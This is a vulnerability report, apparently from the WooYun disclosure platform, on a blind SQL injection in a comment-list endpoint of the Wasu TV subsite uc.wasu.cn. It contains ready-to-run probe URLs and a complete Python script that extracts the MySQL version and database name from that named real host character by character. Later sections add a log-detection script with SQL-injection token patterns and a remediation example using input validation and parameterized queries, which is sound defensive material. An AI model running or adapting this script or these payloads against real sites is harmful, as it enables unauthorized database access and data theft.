
Wasu TV subsite MySQL blind injection (verification script attached)

2015-04-24 04:40

1=1: returns comment data

Code block:
http://uc.wasu.cn/member/index.php/Comment/commentList/page_limit/10/show_style/mobile/type/video/relier/if(1=1,55728,0)

As you can see, comment data is returned, identical to what http://uc.wasu.cn/member/index.php/Comment/commentList/page_limit/10/show_style/mobile/type/video/relier/55728 returns.

(Screenshot: 1.png)

Code block:
http://uc.wasu.cn/member/index.php/Comment/commentList/page_limit/10/show_style/mobile/type/video/relier/if(1=2,55728,0)

1=2: blank, no data returned.

The injection point cannot contain spaces or the less-than sign.

So blind injection is possible.

Proof of vulnerability:

Code block:
#coding=utf-8
# Python 2 script (the original uses Python 2 print/except syntax).
import sys
import urllib2
from urllib2 import URLError, HTTPError


def request(URL):
    # Fetch the page with a browser-like User-Agent; the injected condition
    # rides in the final path segment of URL (the "relier" value).
    user_agent = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10'}
    req = urllib2.Request(URL, None, user_agent)
    try:
        resp = urllib2.urlopen(req)
    except HTTPError, e:
        if e.code == 500:
            return 'Runtime Error'
        raise
    except URLError, e:
        print('[!] We failed to reach a server.')
        print('[!] Reason: ' + str(e.reason))
        sys.exit(1)
    return resp.read()


def binary_sqli(left, right, index):
    # Binary search for the ASCII code of the character at position `index`
    # of concat(@@version,0x3a,database()). The loop keeps the invariant
    # left < char <= right and stops once the interval is one wide, at which
    # point right is the character.
    while 1:
        mid = (left + right)
        if mid % 2:
            mid = mid // 2 + 1
        else:
            mid = mid // 2
        if mid == right:
            sys.stdout.write(chr(mid))
            break
        payload = "if(ascii(substring(concat(@@version,0x3a,database()),%s,1))>%s,55728,0)" % (index, mid)
        html = request('http://uc.wasu.cn/member/index.php/Comment/commentList/page_limit/10/show_style/mobile/type/video/relier/' + payload)
        # 'Woman8394' is a string found in the comment list for relier 55728,
        # so its presence in the response means the condition evaluated true.
        verify = 'Woman8394'
        if verify in html:
            left = mid
        else:
            right = mid


if __name__ == '__main__':
    print 'concat(@@version,0x3a,database()): ',
    for i in range(1, 150):
        binary_sqli(32, 127, i)



(Screenshot: wasu.png)
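The boolean probes above leave a distinctive trail in the web server's access log: one client, many requests to the same comment-list URL, with a "relier" segment that should be a bare integer but instead carries MySQL function calls. The following Python 3 script is an added example for the detection side and is not part of the original report; the log lines are constructed in Apache combined format with made-up IPs, timestamps and sizes, and the URL path is the one shown on this page (one request is percent-encoded to show that decoding must happen before matching).

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample access-log lines (Apache combined format). The IPs,
# timestamps and response sizes are invented for this example.
SAMPLE_LOG = [
    '203.0.113.5 - - [24/Apr/2015:04:40:01 +0800] "GET /member/index.php/Comment/commentList/page_limit/10/show_style/mobile/type/video/relier/55728 HTTP/1.1" 200 4821 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [24/Apr/2015:04:40:02 +0800] "GET /member/index.php/Comment/commentList/page_limit/10/show_style/mobile/type/video/relier/if(1=1,55728,0) HTTP/1.1" 200 4821 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [24/Apr/2015:04:40:03 +0800] "GET /member/index.php/Comment/commentList/page_limit/10/show_style/mobile/type/video/relier/if(1=2,55728,0) HTTP/1.1" 200 312 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [24/Apr/2015:04:40:04 +0800] "GET /member/index.php/Comment/commentList/page_limit/10/show_style/mobile/type/video/relier/if%28ascii%28substring%28concat%28%40%40version%2C0x3a%2Cdatabase%28%29%29%2C1%2C1%29%29%3E79%2C55728%2C0%29 HTTP/1.1" 200 4821 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [24/Apr/2015:04:41:10 +0800] "GET /member/index.php/Comment/commentList/page_limit/10/show_style/mobile/type/video/relier/55729 HTTP/1.1" 200 4790 "-" "Mozilla/5.0"',
]

# Apache combined log: client, identd, user, [timestamp] "METHOD path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# The framework routes /relier/<value>; a legitimate value is a comment id.
RELIER_RE = re.compile(r'/relier/(?P<value>[^/?]+)')

# Tokens that have no business inside an integer id: MySQL conditional,
# string and timing functions, system variables (@@version), and the bare
# numeric comparison a boolean probe is built from. Matched after decoding.
SQLI_TOKENS = re.compile(
    r'\b(?:if|ascii|substring|substr|concat|database|version|sleep|benchmark)\s*\('
    r'|@@\w+'
    r'|\b\d+\s*[=<>]\s*\d+\b',
    re.I,
)


def relier_value(path):
    """Return the percent-decoded relier segment of a request path, or None."""
    m = RELIER_RE.search(path)
    return unquote(m.group('value')) if m else None


def flag_sqli(lines):
    """Return one record per request whose relier value is not a plain integer.

    Every such request is anomalous for this endpoint; the matched token (if
    any) explains why it looks like an injection probe rather than a typo.
    """
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        value = relier_value(m.group('path'))
        if value is None or value.isdigit():
            continue  # well-formed comment id, nothing to report
        tok = SQLI_TOKENS.search(value)
        hits.append({
            'ip': m.group('ip'),
            'ts': m.group('ts'),
            'status': int(m.group('status')),
            'relier': value,
            'token': tok.group(0) if tok else None,
        })
    return hits


def suspects_by_ip(hits):
    """Count flagged requests per client; a blind-injection run produces many."""
    return dict(Counter(h['ip'] for h in hits))


if __name__ == '__main__':
    found = flag_sqli(SAMPLE_LOG)
    for h in found:
        print(h['ts'], h['ip'], h['status'], h['token'], h['relier'])
    print(suspects_by_ip(found))
```

The per-client count is the useful alert condition: a single non-integer value might be a broken link, but the binary search in the script above needs several requests per character, so dozens of flagged requests from one address within a minute is the signature to page on.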

Fix:

Filter the input.
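The page already shows why a blocklist filter is a weak fix: spaces and the less-than sign were rejected at this injection point, yet a payload written with `>` and commas still worked. The following Python 3 snippet is an added example (not the site's code, whose backend is PHP with MySQL) contrasting the vulnerable pattern with the stricter remedy: whitelist validation of the id plus a parameterized query. sqlite3 stands in for MySQL so the example runs offline, and the `comment` table and its columns are assumptions, not the site's schema.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the comment store (assumed schema)."""
    con = sqlite3.connect(':memory:')
    con.execute(
        'CREATE TABLE comment (id INTEGER PRIMARY KEY, relier INTEGER, author TEXT, body TEXT)'
    )
    con.executemany(
        'INSERT INTO comment (relier, author, body) VALUES (?, ?, ?)',
        [
            (55728, 'Woman8394', 'first comment'),   # constructed rows
            (55728, 'user2', 'second comment'),
            (55729, 'user3', 'comment on another video'),
        ],
    )
    return con


def build_query_unsafe(relier, page_limit):
    """The vulnerable pattern: path segments are pasted into the SQL text.

    With relier = 'if(1=1,55728,0)' the database evaluates the attacker's
    condition, which is exactly the oracle the report exploits. Returned as
    a string only; it is never executed here.
    """
    return "SELECT author, body FROM comment WHERE relier=%s LIMIT %s" % (relier, page_limit)


def is_valid_id(value):
    """Whitelist check: an id is a non-empty string of ASCII digits, nothing else."""
    return isinstance(value, str) and value.isdigit()


def parse_id(value):
    if not is_valid_id(value):
        raise ValueError('expected a positive integer id, got %r' % (value,))
    return int(value)


def fetch_comments_safe(con, relier, page_limit):
    """Validate first, then bind as parameters.

    The driver sends the values separately from the statement text, so even
    a value that slipped past validation could not alter the query structure.
    """
    rid = parse_id(relier)
    limit = parse_id(page_limit)
    cur = con.execute(
        'SELECT author, body FROM comment WHERE relier=? ORDER BY id LIMIT ?',
        (rid, limit),
    )
    return cur.fetchall()


if __name__ == '__main__':
    con = make_db()
    print(build_query_unsafe('if(1=1,55728,0)', '10'))      # payload lands in SQL
    print(fetch_comments_safe(con, '55728', '10'))           # legitimate request
    print(is_valid_id('if(1=1,55728,0)'))                    # False: rejected before any SQL
```

Validation and parameterization are independent layers: the whitelist rejects the probe at the edge with a 400-class response instead of the 500 the script above treats as a signal, and parameter binding protects any other call site that forgets to validate.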

Source: www.wooyun.org/bugs/wooyun-2015-0108829
